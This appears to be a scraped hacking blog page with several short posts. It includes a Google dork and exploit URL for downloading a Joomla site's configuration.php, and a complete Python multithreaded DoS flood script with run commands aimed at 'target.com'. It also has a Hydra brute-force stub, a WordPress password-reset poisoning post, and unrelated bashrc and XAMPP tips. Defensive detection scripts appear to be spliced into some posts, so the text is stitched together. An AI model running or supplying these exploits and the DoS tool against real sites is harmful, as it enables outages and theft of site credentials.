
Joomla Exploit! com_joomanager - Arbitrary File Download (b374k, March 21, 2018)




1. Google inurl:"index.php?option=com_joomanager" = 3540 results

2. [URL]+/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php
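The request pattern in step 2 is easy to recognise on the server side. As an added example (not part of the original post), the following Python script scans Apache-style access-log lines for com_joomanager download requests whose path parameter names a configuration file or attempts directory traversal; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample Apache-style access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Mar/2018:10:01:02 +0000] "GET /index.php?option=com_joomanager&controller=details&task=download&path=configuration.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Mar/2018:10:01:09 +0000] "GET /index.php?option=com_joomanager&controller=details&task=download&path=..%2F..%2Fconfiguration.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Mar/2018:10:02:15 +0000] "GET /index.php?option=com_joomanager&controller=details&task=download&path=brochure.pdf HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Mar/2018:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Common Log Format: client IP, timestamp, request line and status are enough here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Files a document-download component should never serve.
SENSITIVE = {"configuration.php", ".htaccess", "wp-config.php"}

def classify(target):
    """Return a reason if the request is a suspicious com_joomanager download, else None."""
    qs = parse_qs(urlparse(target).query)
    if qs.get("option", [""])[0] != "com_joomanager":
        return None
    if qs.get("task", [""])[0] != "download":
        return None
    # parse_qs already decoded once; decode again to catch double encoding.
    path = unquote(qs.get("path", [""])[0])
    if ".." in path or path.startswith("/"):
        return "path traversal in path parameter"
    if path.rsplit("/", 1)[-1].lower() in SENSITIVE:
        return "sensitive file requested"
    return None

def find_suspicious(log_text):
    """Return (client_ip, status, reason) for every suspicious request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("status"), reason))
    return hits

if __name__ == "__main__":
    for ip, status, reason in find_suspicious(SAMPLE_LOG):
        print(ip, status, reason)
```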

Wordpress 4.9.4 Doser - DoS Tool (b374k, February 11, 2018)

Hello friends, thanks to a vulnerability in the WordPress 4.9.4 update, we can use the Doser tool to push CPU usage to 100%, cut the site's database connection and take the site down. This is not an attack carried out from your own internet connection or from a server.





The commands, in order:

git clone https://github.com/Quitten/doser.py.git
cd doser.py
python doser.py -t 999 -g 'http://target.com'

and the attack begins.

Python code:

# Python 2 script (uses the print statement); run it with python2.
import requests
import sys
import threading
import random
import re
import argparse

host=''
headers_useragents=[]
request_counter=0
printedMsgs = []

def printMsg(msg):
    # print each status message only once
    if msg not in printedMsgs:
        print "\n"+msg + " after %i requests" % request_counter
        printedMsgs.append(msg)

def useragent_list():
    global headers_useragents
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

def randomString(size):
    # random upper-case string of the given length
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def initHeaders():
    useragent_list()
    global headers_useragents, additionalHeaders
    headers = {
        'User-Agent': random.choice(headers_useragents),
        'Cache-Control': 'no-cache',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
        'Keep-Alive': str(random.randint(110,120)),
        'Connection': 'keep-alive'
    }
    if additionalHeaders:
        for header in additionalHeaders:
            headers.update({header.split(":")[0]:header.split(":")[1]})
    return headers

def handleStatusCodes(status_code):
    global request_counter
    sys.stdout.write("\r%i requests has been sent" % request_counter)
    sys.stdout.flush()
    if status_code == 429:
        printMsg("You have been throttled")
    if status_code == 500:
        printMsg("Status code 500 received")  # the original called printedMsg(), which does not exist

def sendGET(url):
    global request_counter
    headers = initHeaders()
    try:
        request_counter+=1
        request = requests.get(url, headers=headers)
        # print 'her'
        handleStatusCodes(request.status_code)
    except:
        pass

def sendPOST(url, payload):
    global request_counter
    headers = initHeaders()
    try:
        request_counter+=1
        if payload:
            request = requests.post(url, data=payload, headers=headers)
        else:
            request = requests.post(url, headers=headers)
        handleStatusCodes(request.status_code)
    except:
        pass

class SendGETThread(threading.Thread):
    def run(self):
        try:
            while True:
                global url
                sendGET(url)
        except:
            pass

class SendPOSTThread(threading.Thread):
    def run(self):
        try:
            while True:
                global url, payload
                sendPOST(url, payload)
        except:
            pass

# TODO:
# check if the site stop responding and alert

def main(argv):
    parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
    parser.add_argument('-g', help='Specify GET request. Usage: -g \'\'')
    parser.add_argument('-p', help='Specify POST request. Usage: -p \'\'')
    parser.add_argument('-d', help='Specify data payload for POST request', default=None)
    parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
    parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
    args = parser.parse_args()
    global url, payload, additionalHeaders
    additionalHeaders = args.ah
    payload = args.d
    if args.g:
        url = args.g
        for i in range(args.t):
            t = SendGETThread()
            t.start()
    if args.p:
        url = args.p
        for i in range(args.t):
            t = SendPOSTThread()
            t.start()
    if len(sys.argv)==1:
        parser.print_help()
        exit()

if __name__ == "__main__":
    main(sys.argv[1:])

Make Your Linux Terminal Look Like the ParrotSec Terminal (b374k, January 31, 2018)

Hello friends, you may be using distributions such as Kali Linux, Ubuntu, BackBox and so on, but you might like the ParrotSecOS terminal.
To get it, open a terminal and enter the command:

leafpad .bashrc

then delete the contents of the file that opens and paste the following in its place:

# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1="\[\033[0;31m\]\342\224\214\342\224\200\$([[ \$? != 0 ]] && echo \"[\[\033[0;31m\]\342\234\227\[\033[0;37m\]]\342\224\200\")[$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]root\[\033[01;33m\]@\[\033[01;96m\]\h'; else echo '\[\033[0;39m\]\u\[\033[01;33m\]@\[\033[01;96m\]\h'; fi)\[\033[0;31m\]]\342\224\200[\[\033[0;32m\]\w\[\033[0;31m\]]\n\[\033[0;31m\]\342\224\224\342\224\200\342\224\200\342\225\274 \[\033[0m\]\[\e[01;33m\]\\$\[\e[0m\]"
else
    PS1='┌──[\u@\h]─[\w]\n└──╼ \$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\033[0;31m\]\342\224\214\342\224\200\$([[ \$? != 0 ]] && echo \"[\[\033[0;31m\]\342\234\227\[\033[0;37m\]]\342\224\200\")[$(if [[ ${EUID} == 0 ]]; then echo '\[\033[01;31m\]root\[\033[01;33m\]@\[\033[01;96m\]\h'; else echo '\[\033[0;39m\]\u\[\033[01;33m\]@\[\033[01;96m\]\h'; fi)\[\033[0;31m\]]\342\224\200[\[\033[0;32m\]\w\[\033[0;31m\]]\n\[\033[0;31m\]\342\224\224\342\224\200\342\224\200\342\225\274 \[\033[0m\]\[\e[01;33m\]\\$\[\e[0m\]"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    alias dir='dir --color=auto'
    alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

The result is as follows:

Skype Introduced Insider (Preview) for Linux (b374k, October 06, 2017)

Skype has introduced Skype Insider. This new Skype, which is also available for Linux, has better features and a better look than the old one.

Download link:
https://www.skype.com/tr/insider/

Appearance:

Hydra Brute Force Attack (b374k, September 13, 2017)



Install
sudo apt-get install hydra
1 million word list;

Kali Linux XAMPP Installation (b374k, September 13, 2017)


DOWNLOAD XAMPP

chmod 755 xampp-linux-x64-7.1.4-0-installer.run
./xampp-linux-x64-7.1.4-0-installer.run
To start it: "/opt/lampp/lampp start"

WordPress 4.7.4 Unauthorized Password Reset (b374k, September 13, 2017)

Someone requested that the password be reset for the following account:
http://localhost/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
http://localhost/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin


As we can see, the Return-Path, From and Message-ID fields all have the attacker's domain set.
The headers can be verified by replacing /usr/sbin/sendmail with a bash script such as:
#!/bin/bash
# Instead of delivering the message, write it to a file for inspection.
cat > /tmp/outgoing-email
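To automate the header check described above, here is an added example (not from the original post or the linked advisory) that parses a captured outgoing message, such as the one the replacement sendmail script writes to /tmp/outgoing-email, and reports every sender-related header whose domain is not the site's own. The sample message, the domain attacker-domain.example and the reset key PLACEHOLDERKEY are constructed.

```python
import email

# Constructed sample of a captured password-reset message (not a real capture);
# attacker-domain.example and PLACEHOLDERKEY are placeholders.
CAPTURED_EMAIL = """\
Return-Path: <wordpress@attacker-domain.example>
From: WordPress <wordpress@attacker-domain.example>
To: admin@localhost
Subject: [WordPress] Password Reset
Message-ID: <a1b2c3d4@attacker-domain.example>

Someone requested that the password be reset for the following account:
http://localhost/wordpress/
Username: admin
To reset your password, visit the following address:
http://localhost/wordpress/wp-login.php?action=rp&key=PLACEHOLDERKEY&login=admin
"""

# The headers the post shows carrying the attacker's domain.
HEADERS_TO_CHECK = ("Return-Path", "From", "Message-ID")

def header_domain(value):
    """Return the lower-cased domain after '@' in an address-like header, or None."""
    if value is None:
        return None
    addr = value.strip().rsplit("<", 1)[-1].rstrip(">")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None

def check_sender_domains(raw_message, expected_domain):
    """Return (header, domain) pairs whose domain is not the site's own domain."""
    msg = email.message_from_string(raw_message)
    mismatches = []
    for name in HEADERS_TO_CHECK:
        dom = header_domain(msg.get(name))
        if dom != expected_domain.lower():
            mismatches.append((name, dom))
    return mismatches

if __name__ == "__main__":
    # Read the file written by the replacement sendmail script, if present;
    # fall back to the constructed sample so the script runs stand-alone.
    try:
        with open("/tmp/outgoing-email") as fh:
            raw = fh.read()
    except OSError:
        raw = CAPTURED_EMAIL
    for name, dom in check_sender_domains(raw, "localhost"):
        print("%s uses unexpected domain: %s" % (name, dom))
```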

https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 

b374k © 2015 b374k | Cyber Security